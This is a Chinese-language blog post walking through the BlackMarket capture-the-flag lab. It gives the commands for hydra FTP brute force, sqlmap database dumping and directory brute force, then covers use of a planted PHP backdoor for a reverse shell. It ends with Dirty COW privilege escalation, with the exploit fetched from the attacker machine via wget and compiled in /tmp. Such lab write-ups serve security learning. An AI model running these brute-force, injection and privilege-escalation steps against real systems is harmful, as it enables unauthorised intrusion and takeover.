blackmarket靶机

最新推荐文章于 2024-10-02 15:25:16 发布
最新推荐文章于 2024-10-02 15:25:16 发布
阅读量413 收藏 3
点赞数 3
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73074638/article/details/141090742
版权

目录扫描

指纹识别

访问web服务80端口,发现flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

对数据进行base64解密

Google搜索 https://bourne.fandom.com/wiki/Operation_Treadstone

利用cewl爬取网站生成关联词字典,然后使用hydra爆破21端口

cewl Operation Treadstone | The Bourne Directory | Fandom -d 1 -w BlackMarket_dic.txt

hydra -L BlackMarket_dic.txt -P BlackMarket_dic.txt ftp://192.168.1.2 -vV

得到账号密码nicky:CIA

拿到账号密码进行ftp登录

cd ftp/ImpFiles

more IMP.txt发现flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}

接着回到web端口

尝试弱口令---破解出账号密码supplier:supplier

拼接admin

修改订单时抓取数据包sqlmap测试漏洞

数据库爆破

sqlmap -r 1.txt --dbs --batch

sqlmap -r 1.txt -D BlackMarket --tables --batch

sqlmap -r 1.txt -D BlackMarket -T flag --dump --batch

发现flag3 Find Jason Bourne Email access

添加用户越权漏洞发现flag4

添加一个用户

抓取修改数据包

发现flag4{bm90aGluZyBpcyBoZXJl}

名字为Jbourne,密码为?????

登陆之前扫出的目录/squirrelmail

发现flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}

quipqiup - cryptoquip and cryptogram solver

拼接/kgbbackdoor

1.sql数据库中有一个eworkshop的数据库

利用crunch生成字典进行爆破。

crunch 9 9-t @workshop > BlackMarket_BackdoorPath.txt

2.使用dirb进行爆破->有个路径

dirb http://192.168.1.4/home/kali/BlackMarket_BackdoorPath.txt

拼接/vworkshop,拼接之前的到的提示/kgbbackdoor/PassPass.jpg

下载本地用010Editor工具分析

发现pass

Pass = 5215565757312090656

十进制:5215565757312090656

十六进制:4861696c4b474400

ASCii: HailKGB

得到密码为:HailKGB

访问后门http://192.168.1.2/vworkshop/kgbbackdoor/backdoor.php

输入得到的密码得到flag6{Um9vdCB0aW1l}

点击network尝试反弹shell

kali开启监听

成功反弹shell

# 获取交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

查询系统版本

uname -a 版本为4.4.0

使用脏牛提权

searchsploit dirty

searchsploit -m linux/local/40616.c # 将exp复制到kali

python -m http.server 8001 # 开启临时服务

cd /tmp

wget http://192.168.1.4:8000/40616.c

gcc 40616.c -o cowroot -pthread # 编译.c文件

ls -al

提权成功

pingyao周杰伦
关注
BlackMarket靶机
m0_61995767的博客
08-10 1037
BlackMarket打靶记录
BlackMarket靶机复现
weixin_52956666的博客
08-07 844
因为squirrelmail是web邮箱应用,存在 CVE-2017-7692 远程代码执行漏洞,但是得有一个用户可以登陆进去。因为 内核版本是4.4.0-31-generic,可以进行脏牛 CVE-2016-5195 提权。并且发现一句话Jason Bourne Email access?抓包,去查看,发现存在id值,这里先尝试改为1,因为大部分高权限用户都是1。尝试squirrelmail,squirrelmail。进入后发现没东西,一点发现有个隐藏的输入框。
BlackMarket靶机复现【附代码】(权限提升)
weixin_52487093的博客
08-09 2762
web打洞值得挑战!!!全网最详细的BLACKMARKET打靶过程!【少绕弯路!!!】
小白渗透0-1:BlackMarket靶场渗透记录
qq_49399033的博客
07-01 1358
这是一次BlackMarket靶场渗透记录
渗透测试——BlackMarket
D-R0s1的博客
11-16 2794
第一步:主机发现(找到渗透靶机的ip,使用工具为netdiscover,nmap) 在kali中使用命令安装netdiscover:apt install netdiscover 命令:netdiscover 默认扫描局域网内所有机器,这样的话扫描的是B类地址,所以时间会比较慢。我们也可以直接使用 命令:netdiscover -i eth0 -r 192.168.1.1/24 -i是...
靶机BlackMarket
qq_43335965的博客
07-27 95
工具:nmap、dirbuster、dirb、sqlmap、cewl、crunch、hydra 涉及的漏洞:弱口令 垂直越权 SQL注入 CVE-2016-5195脏牛提权(内核竞争提权漏洞) flag1 这个靶机有六个flag,五个常规的flag和一个root权限下的flag。 寻找靶机IP地址 nmap -sP 192.168.1.* 发现主机,靶机IP地址192.168.1.9 nmap ...
vulnhub-BlackMarket 1靶机
wjSteve的博客
09-27 553
DimitryHateApple这个词很唐突,或许是个密码,尝试登录dimitri,首先获得交互式shell。在BlackMarket库下flag表找到第三个flag,然后提示要找到一个邮箱,爆破user表。到这一步我去看了一下WP,似乎这个Flag指向的是一个电影,通过Wiki的资料生成一个字典。登陆需要密码,怀疑flag4哪里的“access”是个同义词,也就是说密码就是?登陆界面,没有能登陆的信息,查看一下元素找到一个flag。既然有邮箱,那么应该就有邮箱登录的地方,扫一下网站目录。
15. CTF综合靶机渗透(八)
weixin_30651273的博客
07-05 514
VM Name: BlackMarket VM Description: BlackMarket VM presented at Brisbane SecTalks BNE0x1B (28th Session) which is focused on students and other InfoSec Professional. This VM has total 6 flag and o...
BlackMarket
03-21
【标题】BlackMarket 在IT行业中,"BlackMarket"这个名字可能会让人联想到暗网上的非法交易市场,但在编程和开发领域,它可能是指一个特定的项目、框架或应用。由于提供的信息有限,我们只能根据“BlackMarket”这...
blackMarket-开源
04-14
而"blackMarket-开源"通过提供一个直观的Web界面,使得对proftpd的管理变得更加便捷,用户无需直接通过命令行进行操作,降低了管理难度,提高了工作效率。 接下来,我们关注MySQL。MySQL是一个关系型数据库管理系统...
BlackMarketBlackMarket是在商品过期之前购买商品的商店。 Spigot服务器插件(1.8。*-1.16.2)[Minecraft]
02-20
BlackMarket允许您在一定时间内提供商品,之后,如果没有人购买,则商品将退还给您。 它是完全可定制的。 市场与玩家对象 分类目录 列表显示 全国人大 税收 黑名单 过期时间 定制皮肤 自订讯息 自定义菜单 MySQL或...
Backmarket-WatchDog:监控Blackmarket价格并在购买时发送邮件
04-04
后市场看门狗 监视黑市产品价格,并在购买时发送邮件。 运行脚本: python Backmarket-watchdog/report.py --urls_file "Backmarket-watchdog/example_iphones_to_track.txt" --product_name "iPhone" --subject "...
AV-Vangelico-Robbery
04-06
AV-Vangelico-抢劫 在Vangelico Rooftop上寻找通风Kong,植入炸弹并偷走珠宝。 影片预览: : ... 该脚本不包含珠宝销售功能,您需要使用自己的Blackmarket脚本。 Discord:Discord.gg/邀请/ SXSZT6q
【网络安全】Cookie与ID未强绑定导致账户接管
最新发布
等风来
10-02 130
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-27 1203
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 828
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
什么是“0day漏洞”?
分享关于Java编程、数据库管理和信息安全方面的最佳实践
09-29 596
0day漏洞是信息安全中的“幽灵”,因为它的隐蔽性和破坏性往往超出我们的预期。虽然普通用户和企业无法完全规避0day漏洞,但通过保持良好的安全习惯和使用合适的防护工具,可以在一定程度上降低受到0day攻击的风险。信息安全永远在变,防护措施也需要不断更新。在快速发展的网络环境中,我们只有时刻保持警惕,才能最大限度地保护我们的数据和隐私。
【完-网络安全】Windows注册表
Ryoujou的博客
09-29 347
Windows注册表
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-29 2085
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值